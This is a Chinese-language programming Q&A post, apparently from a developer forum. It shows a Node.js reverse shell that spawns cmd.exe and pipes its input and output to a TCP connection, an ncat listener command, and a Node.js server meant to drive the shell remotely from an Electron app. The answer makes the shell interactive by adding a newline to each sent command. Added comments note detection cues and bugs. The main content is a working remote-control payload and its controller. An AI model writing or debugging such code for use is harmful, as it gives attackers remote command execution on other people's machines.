
大家早上好。我在 NodeJS 中遇到了反向 shell 的问题：当我创建套接字并用 netcat 侦听时，它工作得很好；但当我用 net.Server 创建新服务器时，我只收到了 shell 的标头，却无法交互。shell 代码如下：

  // Reverse-shell client (from the question): spawns cmd.exe and wires its
  // stdio to an outbound TCP connection, so whoever listens at the remote
  // address drives the shell. From a detection standpoint this is the pattern
  // to alert on: a node/electron process spawning cmd.exe whose stdin/stdout
  // are attached to a network socket instead of a terminal.
  (function(){
      var net = require("net"),
      child = require("child_process"),
      shell = child.spawn("cmd.exe", []);   // spawn() defaults to piped stdio, so stdin/stdout/stderr are streams
      var client = new net.Socket();
      // Plain TCP to a hard-coded address: no TLS and no authentication on
      // either end, so the traffic is inspectable on the wire.
      client.connect(4545, "192.168.1.2", function(){      
        client.pipe(shell.stdin);      // bytes from the listener -> shell input
        shell.stdout.pipe(client);     // shell output -> listener
        shell.stderr.pipe(client);     // shell errors -> listener
      });
      return /a/;                      // IIFE result is an unused regex literal
  })();

当我用 netcat 侦听时，我可以得到反向 shell：

ncat -nvlp 4545 

但是当我想在 nodejs 中创建 TCP 服务器时就出现了问题：我收到了 cmd.exe 的横幅，但没有交互性。

这是服务器部分的代码:

    const net = require("net");
// Listener side (from the question): a plain TCP server on the same host/port
// the client above connects to. There is no TLS and no authentication, so
// anything that can reach this port can talk to the connected shell.
let server = new net.Server();

server.listen({ host: '192.168.1.2', port: 4545 }, () => {
  console.log(`Server listen in 4545`);
});

server.on("close", () => {
  console.log('connection closed')
});

server.on("error", (e) => {
  if (e.code === "EADDRINUSE") {
    console.log("Address in use, retrying...");
    setTimeout(() => {
      // NOTE(review): arrow functions keep the module-level `this`, which is
      // not the `server` variable declared above; `this.server` is undefined
      // here, so the retry throws instead of re-listening.
      this.server.close();
      this.server.listen(4545, '192.168.1.2');
    }, 2000);
  }
});

server.on("connection", (socket) => {
  console.log("new connection");

  // HERE I SEND COMMAND WITH ELECTRON JS
  socket.write('command');
  // NOTE(review): the parentheses on this line are unbalanced (three opened,
  // two closed), so as posted it is a SyntaxError. Also, socket.pipe(socket)
  // echoes every inbound byte straight back to the peer, and pipe() returns
  // its destination — which is why the value logged is the Socket object
  // dumped below rather than anything the peer sent.
  console.log((socket.pipe(socket));

  // Socket is quitted
  socket.on("close", () => {
      console.log('socket closed')
  });

  socket.on("end", () => {
    // `${socket}` stringifies the Socket object itself, not the peer address.
    console.log(`Client ${socket} disconnected`);
    socket.destroy();
  });      

});

当我发送示例命令 'dir' 时，我收到的是上面服务器代码中 pipe 调用返回的对象。所以问题是：当我发送命令时，如何接收命令的结果，例如在套接字上接收文件和目录列表？

 Socket {
    connecting: false,
    _hadError: false,
    _parent: null,
    _host: null,
    _readableState: ReadableState {
      objectMode: false,
      highWaterMark: 16384,
      buffer: BufferList { head: null, tail: null, length: 0 },
      length: 0,
      pipes: [Circular],
      pipesCount: 1,
      flowing: true,
      ended: false,
      endEmitted: false,
      reading: true,
      sync: false,
      needReadable: true,
      emittedReadable: false,
      readableListening: false,
      resumeScheduled: false,
      paused: false,
      emitClose: false,
      autoDestroy: false,
      destroyed: false,
      defaultEncoding: 'utf8',
      awaitDrain: 0,
      readingMore: false,
      decoder: null,
      encoding: null
    },
    readable: true,
    _events: [Object: null prototype] {
      end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
      close: [ [Function], [Function] ],
      data: [ [Function], [Function: ondata] ],
      unpipe: [Function: onunpipe],
      error: [Function: onerror],
      finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
    },
    _eventsCount: 6,
    _maxListeners: undefined,
    _writableState: WritableState {
      objectMode: false,
      highWaterMark: 16384,
      finalCalled: false,
      needDrain: false,
      ending: false,
      ended: false,
      finished: false,
      destroyed: false,
      decodeStrings: false,
      defaultEncoding: 'utf8',
      length: 0,
      writing: false,
      corked: 0,
      sync: false,
      bufferProcessing: false,
      onwrite: [Function: bound onwrite],
      writecb: null,
      writelen: 0,
      afterWriteTickInfo: {
        count: 1,
        cb: [Function: nop],
        stream: [Circular],
        state: [Circular]
      },
      bufferedRequest: null,
      lastBufferedRequest: null,
      pendingcb: 1,
      prefinished: false,
      errorEmitted: false,
      emitClose: false,
      autoDestroy: false,
      bufferedRequestCount: 0,
      corkedRequestsFree: {
        next: null,
        entry: null,
        finish: [Function: bound onCorkedFinish]
      }
    },
    writable: true,
    allowHalfOpen: false,
    _sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
    _pendingData: null,
    _pendingEncoding: '',
    server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4443',
      [Symbol(asyncId)]: 16
    },
    _server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4545',
      [Symbol(asyncId)]: 16
    },
    id: 790,
    _peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
    [Symbol(asyncId)]: 18,
    [Symbol(kHandle)]: TCP {
      reading: true,
      onconnection: null,
      [Symbol(owner)]: [Circular]
    },
    [Symbol(lastWriteQueueSize)]: 0,
    [Symbol(timeout)]: null,
    [Symbol(kBuffer)]: null,
    [Symbol(kBufferCb)]: null,
    [Symbol(kBufferGen)]: null,
    [Symbol(kBytesRead)]: 0,
    [Symbol(kBytesWritten)]: 0
  }



经过几次尝试，我设法通过在 write 的内容末尾添加 \n 来输入命令，因此代码变为：

// Answer's fix: the payload is sent as one newline-terminated line.
socket.write(`command\n`);
于 2020-06-07T15:24:46.833 回答